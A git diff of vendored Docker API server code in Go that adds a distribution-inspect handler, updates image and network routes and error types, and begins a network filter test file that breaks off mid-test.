+package distribution // import "github.com/docker/docker/api/server/router/distribution"
+
+import (
+	"context"
+	"encoding/base64"
+	"encoding/json"
+	"net/http"
+	"strings"
+
+	"github.com/docker/distribution/manifest/manifestlist"
+	"github.com/docker/distribution/manifest/schema1"
+	"github.com/docker/distribution/manifest/schema2"
+	"github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/types"
+	registrytypes "github.com/docker/docker/api/types/registry"
+	"github.com/opencontainers/image-spec/specs-go/v1"
+	"github.com/pkg/errors"
+)
+
+func (s *distributionRouter) getDistributionInfo(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	w.Header().Set("Content-Type", "application/json")
+
+	var (
+		config              = &types.AuthConfig{}
+		authEncoded         = r.Header.Get("X-Registry-Auth")
+		distributionInspect registrytypes.DistributionInspect
+	)
+
+	if authEncoded != "" {
+		authJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authEncoded))
+		if err := json.NewDecoder(authJSON).Decode(&config); err != nil {
+			// for a search it is not an error if no auth was given
+			// to increase compatibility with the existing api it is defaulting to be empty
+			config = &types.AuthConfig{}
+		}
+	}
+
+	image := vars["name"]
+
+	ref, err := reference.ParseAnyReference(image)
+	if err != nil {
+		return err
+	}
+	namedRef, ok := ref.(reference.Named)
+	if !ok {
+		if _, ok := ref.(reference.Digested); ok {
+			// full image ID
+			return errors.Errorf("no manifest found for full image ID")
+		}
+		return errors.Errorf("unknown image reference format: %s", image)
+	}
+
+	distrepo, _, err := s.backend.GetRepository(ctx, namedRef, config)
+	if err != nil {
+		return err
+	}
+	blobsrvc := distrepo.Blobs(ctx)
+
+	if canonicalRef, ok := namedRef.(reference.Canonical); !ok {
+		namedRef = reference.TagNameOnly(namedRef)
+
+		taggedRef, ok := namedRef.(reference.NamedTagged)
+		if !ok {
+			return errors.Errorf("image reference not tagged: %s", image)
+		}
+
+		descriptor, err := distrepo.Tags(ctx).Get(ctx, taggedRef.Tag())
+		if err != nil {
+			return err
+		}
+		distributionInspect.Descriptor = v1.Descriptor{
+			MediaType: descriptor.MediaType,
+			Digest:    descriptor.Digest,
+			Size:      descriptor.Size,
+		}
+	} else {
+		// TODO(nishanttotla): Once manifests can be looked up as a blob, the
+		// descriptor should be set using blobsrvc.Stat(ctx, canonicalRef.Digest())
+		// instead of having to manually fill in the fields
+		distributionInspect.Descriptor.Digest = canonicalRef.Digest()
+	}
+
+	// we have a digest, so we can retrieve the manifest
+	mnfstsrvc, err := distrepo.Manifests(ctx)
+	if err != nil {
+		return err
+	}
+	mnfst, err := mnfstsrvc.Get(ctx, distributionInspect.Descriptor.Digest)
+	if err != nil {
+		return err
+	}
+
+	mediaType, payload, err := mnfst.Payload()
+	if err != nil {
+		return err
+	}
+	// update MediaType because registry might return something incorrect
+	distributionInspect.Descriptor.MediaType = mediaType
+	if distributionInspect.Descriptor.Size == 0 {
+		distributionInspect.Descriptor.Size = int64(len(payload))
+	}
+
+	// retrieve platform information depending on the type of manifest
+	switch mnfstObj := mnfst.(type) {
+	case *manifestlist.DeserializedManifestList:
+		for _, m := range mnfstObj.Manifests {
+			distributionInspect.Platforms = append(distributionInspect.Platforms, v1.Platform{
+				Architecture: m.Platform.Architecture,
+				OS:           m.Platform.OS,
+				OSVersion:    m.Platform.OSVersion,
+				OSFeatures:   m.Platform.OSFeatures,
+				Variant:      m.Platform.Variant,
+			})
+		}
+	case *schema2.DeserializedManifest:
+		configJSON, err := blobsrvc.Get(ctx, mnfstObj.Config.Digest)
+		var platform v1.Platform
+		if err == nil {
+			err := json.Unmarshal(configJSON, &platform)
+			if err == nil && (platform.OS != "" || platform.Architecture != "") {
+				distributionInspect.Platforms = append(distributionInspect.Platforms, platform)
+			}
+		}
+	case *schema1.SignedManifest:
+		platform := v1.Platform{
+			Architecture: mnfstObj.Architecture,
+			OS:           "linux",
+		}
+		distributionInspect.Platforms = append(distributionInspect.Platforms, platform)
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, distributionInspect)
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/experimental.go b/vendor/github.com/docker/docker/api/server/router/experimental.go
index 51385c2552..c42e53a3d9 100644
--- a/vendor/github.com/docker/docker/api/server/router/experimental.go
+++ b/vendor/github.com/docker/docker/api/server/router/experimental.go
@@ -1,19 +1,12 @@
-package router
+package router // import "github.com/docker/docker/api/server/router"
 
 import (
-	"errors"
+	"context"
 	"net/http"
 
-	"golang.org/x/net/context"
-
-	apierrors "github.com/docker/docker/api/errors"
 	"github.com/docker/docker/api/server/httputils"
 )
 
-var (
-	errExperimentalFeature = errors.New("This experimental feature is disabled by default. Start the Docker daemon with --experimental in order to enable it.")
-)
-
 // ExperimentalRoute defines an experimental API route that can be enabled or disabled.
 type ExperimentalRoute interface {
 	Route
@@ -39,8 +32,16 @@ func (r *experimentalRoute) Disable() {
 	r.handler = experimentalHandler
 }
 
+type notImplementedError struct{}
+
+func (notImplementedError) Error() string {
+	return "This experimental feature is disabled by default. Start the Docker daemon in experimental mode in order to enable it."
+}
+
+func (notImplementedError) NotImplemented() {}
+
 func experimentalHandler(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
-	return apierrors.NewErrorWithStatusCode(errExperimentalFeature, http.StatusNotImplemented)
+	return notImplementedError{}
 }
 
 // Handler returns returns the APIFunc to let the server wrap it in middlewares.
diff --git a/vendor/github.com/docker/docker/api/server/router/image/backend.go b/vendor/github.com/docker/docker/api/server/router/image/backend.go
index 19a67a5ed0..93c47cf638 100644
--- a/vendor/github.com/docker/docker/api/server/router/image/backend.go
+++ b/vendor/github.com/docker/docker/api/server/router/image/backend.go
@@ -1,45 +1,40 @@
-package image
+package image // import "github.com/docker/docker/api/server/router/image"
 
 import (
+	"context"
 	"io"
 
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/backend"
 	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/image"
 	"github.com/docker/docker/api/types/registry"
-	"golang.org/x/net/context"
 )
 
 // Backend is all the methods that need to be implemented
 // to provide image specific functionality.
 type Backend interface {
-	containerBackend
 	imageBackend
 	importExportBackend
 	registryBackend
 }
 
-type containerBackend interface {
-	Commit(name string, config *backend.ContainerCommitConfig) (imageID string, err error)
-}
-
 type imageBackend interface {
-	ImageDelete(imageRef string, force, prune bool) ([]types.ImageDelete, error)
-	ImageHistory(imageName string) ([]*types.ImageHistory, error)
+	ImageDelete(imageRef string, force, prune bool) ([]types.ImageDeleteResponseItem, error)
+	ImageHistory(imageName string) ([]*image.HistoryResponseItem, error)
 	Images(imageFilters filters.Args, all bool, withExtraAttrs bool) ([]*types.ImageSummary, error)
 	LookupImage(name string) (*types.ImageInspect, error)
-	TagImage(imageName, repository, tag string) error
-	ImagesPrune(pruneFilters filters.Args) (*types.ImagesPruneReport, error)
+	TagImage(imageName, repository, tag string) (string, error)
+	ImagesPrune(ctx context.Context, pruneFilters filters.Args) (*types.ImagesPruneReport, error)
 }
 
 type importExportBackend interface {
 	LoadImage(inTar io.ReadCloser, outStream io.Writer, quiet bool) error
-	ImportImage(src string, repository, tag string, msg string, inConfig io.ReadCloser, outStream io.Writer, changes []string) error
+	ImportImage(src string, repository, platform string, tag string, msg string, inConfig io.ReadCloser, outStream io.Writer, changes []string) error
 	ExportImage(names []string, outStream io.Writer) error
 }
 
 type registryBackend interface {
-	PullImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error
+	PullImage(ctx context.Context, image, tag, platform string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error
 	PushImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error
 	SearchRegistryForImages(ctx context.Context, filtersArgs string, term string, limit int, authConfig *types.AuthConfig, metaHeaders map[string][]string) (*registry.SearchResults, error)
 }
diff --git a/vendor/github.com/docker/docker/api/server/router/image/image.go b/vendor/github.com/docker/docker/api/server/router/image/image.go
index 54a4d51482..6d5d87f63c 100644
--- a/vendor/github.com/docker/docker/api/server/router/image/image.go
+++ b/vendor/github.com/docker/docker/api/server/router/image/image.go
@@ -1,23 +1,18 @@
-package image
+package image // import "github.com/docker/docker/api/server/router/image"
 
 import (
-	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/api/server/router"
 )
 
 // imageRouter is a router to talk with the image controller
 type imageRouter struct {
 	backend Backend
-	decoder httputils.ContainerDecoder
 	routes  []router.Route
 }
 
 // NewRouter initializes a new image router
-func NewRouter(backend Backend, decoder httputils.ContainerDecoder) router.Router {
-	r := &imageRouter{
-		backend: backend,
-		decoder: decoder,
-	}
+func NewRouter(backend Backend) router.Router {
+	r := &imageRouter{backend: backend}
 	r.initRoutes()
 	return r
 }
@@ -38,12 +33,11 @@ func (r *imageRouter) initRoutes() {
 		router.NewGetRoute("/images/{name:.*}/history", r.getImagesHistory),
 		router.NewGetRoute("/images/{name:.*}/json", r.getImagesByName),
 		// POST
-		router.NewPostRoute("/commit", r.postCommit),
 		router.NewPostRoute("/images/load", r.postImagesLoad),
-		router.Cancellable(router.NewPostRoute("/images/create", r.postImagesCreate)),
-		router.Cancellable(router.NewPostRoute("/images/{name:.*}/push", r.postImagesPush)),
+		router.NewPostRoute("/images/create", r.postImagesCreate, router.WithCancel),
+		router.NewPostRoute("/images/{name:.*}/push", r.postImagesPush, router.WithCancel),
 		router.NewPostRoute("/images/{name:.*}/tag", r.postImagesTag),
-		router.NewPostRoute("/images/prune", r.postImagesPrune),
+		router.NewPostRoute("/images/prune", r.postImagesPrune, router.WithCancel),
 		// DELETE
 		router.NewDeleteRoute("/images/{name:.*}", r.deleteImages),
 	}
diff --git a/vendor/github.com/docker/docker/api/server/router/image/image_routes.go b/vendor/github.com/docker/docker/api/server/router/image/image_routes.go
index 69403652a0..8e32d0292e 100644
--- a/vendor/github.com/docker/docker/api/server/router/image/image_routes.go
+++ b/vendor/github.com/docker/docker/api/server/router/image/image_routes.go
@@ -1,125 +1,89 @@
-package image
+package image // import "github.com/docker/docker/api/server/router/image"
 
 import (
+	"context"
 	"encoding/base64"
 	"encoding/json"
 	"fmt"
-	"io"
 	"net/http"
 	"strconv"
 	"strings"
 
 	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/backend"
-	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/pkg/ioutils"
 	"github.com/docker/docker/pkg/streamformatter"
+	"github.com/docker/docker/pkg/system"
 	"github.com/docker/docker/registry"
-	"golang.org/x/net/context"
+	specs "github.com/opencontainers/image-spec/specs-go/v1"
+	"github.com/pkg/errors"
 )
 
-func (s *imageRouter) postCommit(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
-	if err := httputils.ParseForm(r); err != nil {
-		return err
-	}
-
-	if err := httputils.CheckForJSON(r); err != nil {
-		return err
-	}
-
-	cname := r.Form.Get("container")
-
-	pause := httputils.BoolValue(r, "pause")
-	version := httputils.VersionFromContext(ctx)
-	if r.FormValue("pause") == "" && versions.GreaterThanOrEqualTo(version, "1.13") {
-		pause = true
-	}
-
-	c, _, _, err := s.decoder.DecodeConfig(r.Body)
-	if err != nil && err != io.EOF { //Do not fail if body is empty.
-		return err
-	}
-	if c == nil {
-		c = &container.Config{}
-	}
-
-	commitCfg := &backend.ContainerCommitConfig{
-		ContainerCommitConfig: types.ContainerCommitConfig{
-			Pause:        pause,
-			Repo:         r.Form.Get("repo"),
-			Tag:          r.Form.Get("tag"),
-			Author:       r.Form.Get("author"),
-			Comment:      r.Form.Get("comment"),
-			Config:       c,
-			MergeConfigs: true,
-		},
-		Changes: r.Form["changes"],
-	}
-
-	imgID, err := s.backend.Commit(cname, commitCfg)
-	if err != nil {
-		return err
-	}
-
-	return httputils.WriteJSON(w, http.StatusCreated, &types.IDResponse{
-		ID: string(imgID),
-	})
-}
-
 // Creates an image from Pull or from Import
 func (s *imageRouter) postImagesCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+
 	if err := httputils.ParseForm(r); err != nil {
 		return err
 	}
 
 	var (
-		image   = r.Form.Get("fromImage")
-		repo    = r.Form.Get("repo")
-		tag     = r.Form.Get("tag")
-		message = r.Form.Get("message")
-		err     error
-		output  = ioutils.NewWriteFlusher(w)
+		image    = r.Form.Get("fromImage")
+		repo     = r.Form.Get("repo")
+		tag      = r.Form.Get("tag")
+		message  = r.Form.Get("message")
+		err      error
+		output   = ioutils.NewWriteFlusher(w)
+		platform = &specs.Platform{}
 	)
 	defer output.Close()
 
 	w.Header().Set("Content-Type", "application/json")
 
-	if image != "" { //pull
-		metaHeaders := map[string][]string{}
-		for k, v := range r.Header {
-			if strings.HasPrefix(k, "X-Meta-") {
-				metaHeaders[k] = v
-			}
+	version := httputils.VersionFromContext(ctx)
+	if versions.GreaterThanOrEqualTo(version, "1.32") {
+		apiPlatform := r.FormValue("platform")
+		platform = system.ParsePlatform(apiPlatform)
+		if err = system.ValidatePlatform(platform); err != nil {
+			err = fmt.Errorf("invalid platform: %s", err)
 		}
+	}
 
-		authEncoded := r.Header.Get("X-Registry-Auth")
-		authConfig := &types.AuthConfig{}
-		if authEncoded != "" {
-			authJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authEncoded))
-			if err := json.NewDecoder(authJSON).Decode(authConfig); err != nil {
-				// for a pull it is not an error if no auth was given
-				// to increase compatibility with the existing api it is defaulting to be empty
-				authConfig = &types.AuthConfig{}
+	if err == nil {
+		if image != "" { //pull
+			metaHeaders := map[string][]string{}
+			for k, v := range r.Header {
+				if strings.HasPrefix(k, "X-Meta-") {
+					metaHeaders[k] = v
+				}
 			}
-		}
 
-		err = s.backend.PullImage(ctx, image, tag, metaHeaders, authConfig, output)
-	} else { //import
-		src := r.Form.Get("fromSrc")
-		// 'err' MUST NOT be defined within this block, we need any error
-		// generated from the download to be available to the output
-		// stream processing below
-		err = s.backend.ImportImage(src, repo, tag, message, r.Body, output, r.Form["changes"])
+			authEncoded := r.Header.Get("X-Registry-Auth")
+			authConfig := &types.AuthConfig{}
+			if authEncoded != "" {
+				authJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authEncoded))
+				if err := json.NewDecoder(authJSON).Decode(authConfig); err != nil {
+					// for a pull it is not an error if no auth was given
+					// to increase compatibility with the existing api it is defaulting to be empty
+					authConfig = &types.AuthConfig{}
+				}
+			}
+			err = s.backend.PullImage(ctx, image, tag, platform.OS, metaHeaders, authConfig, output)
+		} else { //import
+			src := r.Form.Get("fromSrc")
+			// 'err' MUST NOT be defined within this block, we need any error
+			// generated from the download to be available to the output
+			// stream processing below
+			err = s.backend.ImportImage(src, repo, platform.OS, tag, message, r.Body, output, r.Form["changes"])
+		}
 	}
 	if err != nil {
 		if !output.Flushed() {
 			return err
 		}
-		sf := streamformatter.NewJSONStreamFormatter()
-		output.Write(sf.FormatError(err))
+		output.Write(streamformatter.FormatError(err))
 	}
 
 	return nil
@@ -148,7 +112,7 @@ func (s *imageRouter) postImagesPush(ctx context.Context, w http.ResponseWriter,
 	} else {
 		// the old format is supported for compatibility if there was no authConfig header
 		if err := json.NewDecoder(r.Body).Decode(authConfig); err != nil {
-			return fmt.Errorf("Bad parameters and missing X-Registry-Auth: %v", err)
+			return errors.Wrap(errdefs.InvalidParameter(err), "Bad parameters and missing X-Registry-Auth")
 		}
 	}
 
@@ -164,8 +128,7 @@ func (s *imageRouter) postImagesPush(ctx context.Context, w http.ResponseWriter,
 		if !output.Flushed() {
 			return err
 		}
-		sf := streamformatter.NewJSONStreamFormatter()
-		output.Write(sf.FormatError(err))
+		output.Write(streamformatter.FormatError(err))
 	}
 	return nil
 }
@@ -190,8 +153,7 @@ func (s *imageRouter) getImagesGet(ctx context.Context, w http.ResponseWriter, r
 		if !output.Flushed() {
 			return err
 		}
-		sf := streamformatter.NewJSONStreamFormatter()
-		output.Write(sf.FormatError(err))
+		output.Write(streamformatter.FormatError(err))
 	}
 	return nil
 }
@@ -207,11 +169,19 @@ func (s *imageRouter) postImagesLoad(ctx context.Context, w http.ResponseWriter,
 	output := ioutils.NewWriteFlusher(w)
 	defer output.Close()
 	if err := s.backend.LoadImage(r.Body, output, quiet); err != nil {
-		output.Write(streamformatter.NewJSONStreamFormatter().FormatError(err))
+		output.Write(streamformatter.FormatError(err))
 	}
 	return nil
 }
 
+type missingImageError struct{}
+
+func (missingImageError) Error() string {
+	return "image name cannot be blank"
+}
+
+func (missingImageError) InvalidParameter() {}
+
 func (s *imageRouter) deleteImages(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
 	if err := httputils.ParseForm(r); err != nil {
 		return err
@@ -220,7 +190,7 @@ func (s *imageRouter) deleteImages(ctx context.Context, w http.ResponseWriter, r
 	name := vars["name"]
 
 	if strings.TrimSpace(name) == "" {
-		return fmt.Errorf("image name cannot be blank")
+		return missingImageError{}
 	}
 
 	force := httputils.BoolValue(r, "force")
@@ -248,14 +218,14 @@ func (s *imageRouter) getImagesJSON(ctx context.Context, w http.ResponseWriter,
 		return err
 	}
 
-	imageFilters, err := filters.FromParam(r.Form.Get("filters"))
+	imageFilters, err := filters.FromJSON(r.Form.Get("filters"))
 	if err != nil {
 		return err
 	}
 
-	version := httputils.VersionFromContext(ctx)
 	filterParam := r.Form.Get("filter")
-	if versions.LessThan(version, "1.28") && filterParam != "" {
+	// FIXME(vdemeester) This has been deprecated in 1.13, and is target for removal for v17.12
+	if filterParam != "" {
 		imageFilters.Add("reference", filterParam)
 	}
 
@@ -281,7 +251,7 @@ func (s *imageRouter) postImagesTag(ctx context.Context, w http.ResponseWriter,
 	if err := httputils.ParseForm(r); err != nil {
 		return err
 	}
-	if err := s.backend.TagImage(vars["name"], r.Form.Get("repo"), r.Form.Get("tag")); err != nil {
+	if _, err := s.backend.TagImage(vars["name"], r.Form.Get("repo"), r.Form.Get("tag")); err != nil {
 		return err
 	}
 	w.WriteHeader(http.StatusCreated)
@@ -331,12 +301,12 @@ func (s *imageRouter) postImagesPrune(ctx context.Context, w http.ResponseWriter
 		return err
 	}
 
-	pruneFilters, err := filters.FromParam(r.Form.Get("filters"))
+	pruneFilters, err := filters.FromJSON(r.Form.Get("filters"))
 	if err != nil {
 		return err
 	}
 
-	pruneReport, err := s.backend.ImagesPrune(pruneFilters)
+	pruneReport, err := s.backend.ImagesPrune(ctx, pruneFilters)
 	if err != nil {
 		return err
 	}
diff --git a/vendor/github.com/docker/docker/api/server/router/local.go b/vendor/github.com/docker/docker/api/server/router/local.go
index 7cb2a5a2f3..79a323928e 100644
--- a/vendor/github.com/docker/docker/api/server/router/local.go
+++ b/vendor/github.com/docker/docker/api/server/router/local.go
@@ -1,12 +1,16 @@
-package router
+package router // import "github.com/docker/docker/api/server/router"
 
 import (
+	"context"
 	"net/http"
 
 	"github.com/docker/docker/api/server/httputils"
-	"golang.org/x/net/context"
 )
 
+// RouteWrapper wraps a route with extra functionality.
+// It is passed in when creating a new route.
+type RouteWrapper func(r Route) Route
+
 // localRoute defines an individual API route to connect
 // with the docker daemon. It implements Route.
 type localRoute struct {
@@ -31,38 +35,42 @@ func (l localRoute) Path() string {
 }
 
 // NewRoute initializes a new local route for the router.
-func NewRoute(method, path string, handler httputils.APIFunc) Route {
-	return localRoute{method, path, handler}
+func NewRoute(method, path string, handler httputils.APIFunc, opts ...RouteWrapper) Route {
+	var r Route = localRoute{method, path, handler}
+	for _, o := range opts {
+		r = o(r)
+	}
+	return r
 }
 
 // NewGetRoute initializes a new route with the http method GET.
-func NewGetRoute(path string, handler httputils.APIFunc) Route {
-	return NewRoute("GET", path, handler)
+func NewGetRoute(path string, handler httputils.APIFunc, opts ...RouteWrapper) Route {
+	return NewRoute("GET", path, handler, opts...)
 }
 
 // NewPostRoute initializes a new route with the http method POST.
-func NewPostRoute(path string, handler httputils.APIFunc) Route {
-	return NewRoute("POST", path, handler)
+func NewPostRoute(path string, handler httputils.APIFunc, opts ...RouteWrapper) Route {
+	return NewRoute("POST", path, handler, opts...)
 }
 
 // NewPutRoute initializes a new route with the http method PUT.
-func NewPutRoute(path string, handler httputils.APIFunc) Route {
-	return NewRoute("PUT", path, handler)
+func NewPutRoute(path string, handler httputils.APIFunc, opts ...RouteWrapper) Route {
+	return NewRoute("PUT", path, handler, opts...)
 }
 
 // NewDeleteRoute initializes a new route with the http method DELETE.
-func NewDeleteRoute(path string, handler httputils.APIFunc) Route {
-	return NewRoute("DELETE", path, handler)
+func NewDeleteRoute(path string, handler httputils.APIFunc, opts ...RouteWrapper) Route {
+	return NewRoute("DELETE", path, handler, opts...)
 }
 
 // NewOptionsRoute initializes a new route with the http method OPTIONS.
-func NewOptionsRoute(path string, handler httputils.APIFunc) Route {
-	return NewRoute("OPTIONS", path, handler)
+func NewOptionsRoute(path string, handler httputils.APIFunc, opts ...RouteWrapper) Route {
+	return NewRoute("OPTIONS", path, handler, opts...)
 }
 
 // NewHeadRoute initializes a new route with the http method HEAD.
-func NewHeadRoute(path string, handler httputils.APIFunc) Route {
-	return NewRoute("HEAD", path, handler)
+func NewHeadRoute(path string, handler httputils.APIFunc, opts ...RouteWrapper) Route {
+	return NewRoute("HEAD", path, handler, opts...)
 }
 
 func cancellableHandler(h httputils.APIFunc) httputils.APIFunc {
@@ -85,9 +93,9 @@ func cancellableHandler(h httputils.APIFunc) httputils.APIFunc {
 	}
 }
 
-// Cancellable makes new route which embeds http.CloseNotifier feature to
+// WithCancel makes new route which embeds http.CloseNotifier feature to
 // context.Context of handler.
-func Cancellable(r Route) Route {
+func WithCancel(r Route) Route {
 	return localRoute{
 		method:  r.Method(),
 		path:    r.Path(),
diff --git a/vendor/github.com/docker/docker/api/server/router/network/backend.go b/vendor/github.com/docker/docker/api/server/router/network/backend.go
index 0d1dfb0123..1bab353a5a 100644
--- a/vendor/github.com/docker/docker/api/server/router/network/backend.go
+++ b/vendor/github.com/docker/docker/api/server/router/network/backend.go
@@ -1,6 +1,8 @@
-package network
+package network // import "github.com/docker/docker/api/server/router/network"
 
 import (
+	"context"
+
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/network"
@@ -11,12 +13,20 @@ import (
 // to provide network specific functionality.
 type Backend interface {
 	FindNetwork(idName string) (libnetwork.Network, error)
-	GetNetworkByName(idName string) (libnetwork.Network, error)
-	GetNetworksByID(partialID string) []libnetwork.Network
 	GetNetworks() []libnetwork.Network
 	CreateNetwork(nc types.NetworkCreateRequest) (*types.NetworkCreateResponse, error)
 	ConnectContainerToNetwork(containerName, networkName string, endpointConfig *network.EndpointSettings) error
 	DisconnectContainerFromNetwork(containerName string, networkName string, force bool) error
-	DeleteNetwork(name string) error
-	NetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error)
+	DeleteNetwork(networkID string) error
+	NetworksPrune(ctx context.Context, pruneFilters filters.Args) (*types.NetworksPruneReport, error)
+}
+
+// ClusterBackend is all the methods that need to be implemented
+// to provide cluster network specific functionality.
+type ClusterBackend interface {
+	GetNetworks() ([]types.NetworkResource, error)
+	GetNetwork(name string) (types.NetworkResource, error)
+	GetNetworksByName(name string) ([]types.NetworkResource, error)
+	CreateNetwork(nc types.NetworkCreateRequest) (string, error)
+	RemoveNetwork(name string) error
 }
diff --git a/vendor/github.com/docker/docker/api/server/router/network/filter.go b/vendor/github.com/docker/docker/api/server/router/network/filter.go
index 94affb83cd..02683e8005 100644
--- a/vendor/github.com/docker/docker/api/server/router/network/filter.go
+++ b/vendor/github.com/docker/docker/api/server/router/network/filter.go
@@ -1,25 +1,13 @@
-package network
+package network // import "github.com/docker/docker/api/server/router/network"
 
 import (
-	"fmt"
-
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/runconfig"
 )
 
-var (
-	// AcceptedFilters is an acceptable filters for validation
-	AcceptedFilters = map[string]bool{
-		"driver": true,
-		"type":   true,
-		"name":   true,
-		"id":     true,
-		"label":  true,
-	}
-)
-
-func filterNetworkByType(nws []types.NetworkResource, netType string) (retNws []types.NetworkResource, err error) {
+func filterNetworkByType(nws []types.NetworkResource, netType string) ([]types.NetworkResource, error) {
+	retNws := []types.NetworkResource{}
 	switch netType {
 	case "builtin":
 		for _, nw := range nws {
@@ -34,11 +22,19 @@ func filterNetworkByType(nws []types.NetworkResource, netType string) (retNws []
 			}
 		}
 	default:
-		return nil, fmt.Errorf("Invalid filter: 'type'='%s'", netType)
+		return nil, invalidFilter(netType)
 	}
 	return retNws, nil
 }
 
+type invalidFilter string
+
+func (e invalidFilter) Error() string {
+	return "Invalid filter: 'type'='" + string(e) + "'"
+}
+
+func (e invalidFilter) InvalidParameter() {}
+
 // filterNetworks filters network list according to user specified filter
 // and returns user chosen networks
 func filterNetworks(nws []types.NetworkResource, filter filters.Args) ([]types.NetworkResource, error) {
@@ -47,37 +43,38 @@ func filterNetworks(nws []types.NetworkResource, filter filters.Args) ([]types.N
 		return nws, nil
 	}
 
-	if err := filter.Validate(AcceptedFilters); err != nil {
-		return nil, err
-	}
-
 	displayNet := []types.NetworkResource{}
 	for _, nw := range nws {
-		if filter.Include("driver") {
+		if filter.Contains("driver") {
 			if !filter.ExactMatch("driver", nw.Driver) {
 				continue
 			}
 		}
-		if filter.Include("name") {
+		if filter.Contains("name") {
 			if !filter.Match("name", nw.Name) {
 				continue
 			}
 		}
-		if filter.Include("id") {
+		if filter.Contains("id") {
 			if !filter.Match("id", nw.ID) {
 				continue
 			}
 		}
-		if filter.Include("label") {
+		if filter.Contains("label") {
 			if !filter.MatchKVList("label", nw.Labels) {
 				continue
 			}
 		}
+		if filter.Contains("scope") {
+			if !filter.ExactMatch("scope", nw.Scope) {
+				continue
+			}
+		}
 		displayNet = append(displayNet, nw)
 	}
 
-	if filter.Include("type") {
-		var typeNet []types.NetworkResource
+	if filter.Contains("type") {
+		typeNet := []types.NetworkResource{}
 		errFilter := filter.WalkValues("type", func(fval string) error {
 			passList, err := filterNetworkByType(displayNet, fval)
 			if err != nil {
diff --git a/vendor/github.com/docker/docker/api/server/router/network/filter_test.go b/vendor/github.com/docker/docker/api/server/router/network/filter_test.go
new file mode 100644
index 0000000000..8a84fd16fe
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/network/filter_test.go
@@ -0,0 +1,149 @@
+// +build !windows
+
+package network // import "github.com/docker/docker/api/server/router/network"
+
+import (
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+)
+
+func TestFilterNetworks(t *testing.T) {
+	networks := []types.NetworkResource{
+		{
+			Name:   "host",
+			Driver: "host",
+			Scope:  "local",
+		},
+		{
+			Name:   "bridge",
+			Driver: "bridge",
+			Scope:  "local",
+		},
+		{
+			Name:   "none",
+			Driver: "null",
+			Scope:  "local",
+		},
+		{
+			Name:   "myoverlay",
+			Driver: "overlay",
+			Scope:  "swarm",
+		},
+		{
+			Name:   "mydrivernet",
+			Driver: "mydriver",
+			Scope:  "local",
+		},
+		{
+			Name:   "mykvnet",
+			Driver: "mykvdriver",
+			Scope:  "global",
+		},
+	}
+
+	bridgeDriverFilters := filters.NewArgs()
+	bridgeDriverFilters.Add("driver", "bridge")
+
+	overlayDriverFilters := filters.NewArgs()
+	overlayDriverFilters.Add("driver", "overlay")
+
+	nonameDriverFilters := filters.NewArgs()
+	nonameDriverFilters.Add("driver", "noname")
+
+	customDriverFilters := filters.NewArgs()
+	customDriverFilters.Add("type", "custom")
+
+	builtinDriverFilters := filters.NewArgs()
+	builtinDriverFilters.Add("type", "builtin")
+
+	invalidDriverFilters := filters.NewArgs()
+	invalidDriverFilters.Add("type", "invalid")
+
+	localScopeFilters := filters.NewArgs()
+	localScopeFilters.Add("scope", "local")
+
+	swarmScopeFilters := filters.NewArgs()
+	swarmScopeFilters.Add("scope", "swarm")
+
+	globalScopeFilters := filters.NewArgs()
+	globalScopeFilters.Add("scope", "global")
+
+	testCases := []struct {
+		filter      filters.Args
+		resultCount int
+		err         string
+	}{
+		{
+			filter:      bridgeDriverFilters,
+			resultCount: 1,
+			err:         "",
+		},
+		{
+			filter:      overlayDriverFilters,
+			resultCount: 1,
+			err:         "",
+		},
+		{
+			filter:      nonameDriverFilters,
+			resultCount: 0,
+			err:         "",
+		},
+		{
+			filter:      customDriverFilters,
+			resultCount: 3,
+			err:         "",
+		},
+		{
+			filter:      builtinDriverFilters,
+			resultCount: 3,
+			err:         "",
+		},
+		{
+			filter:      invalidDriverFilters,
+			resultCount: 0,
+			err:         "Invalid filter: 'type'='invalid'",
+		},
+		{
+			filter:      localScopeFilters,
+			resultCount: 4,
+			err:         "",
+		},
+		{
+			filter:      swarmScopeFilters,
+			resultCount: 1,
+			err:         "",
+		},
+		{
+			filter:      globalScopeFilters,
+			resultCount: 1,
+			err:         "",
+		},
+	}
+
+	for _, testCase := range testCases {
+		result, err := filterNetworks(networks, testCase.filter)
+		if testCase.err != "" {
+			if err == nil {
+				t.Fatalf("expect error '%s', got no error", testCase.err)
+
+			} else if !strings.Contains(err.Error(), testCase.err) {
+				t.Fatalf("expect error '%s', got '%s'", testCase.err, err)
+			}
+		} else {
+			if err != nil {
+				t.Fatalf("expect no error, got error '%s'", err)
+			}
+			// Make sure result is not nil
+			if result == nil {
+				t.Fatal("filterNetworks should not return nil")
+			}
+
+			if len(result) != testCase.resultCount {
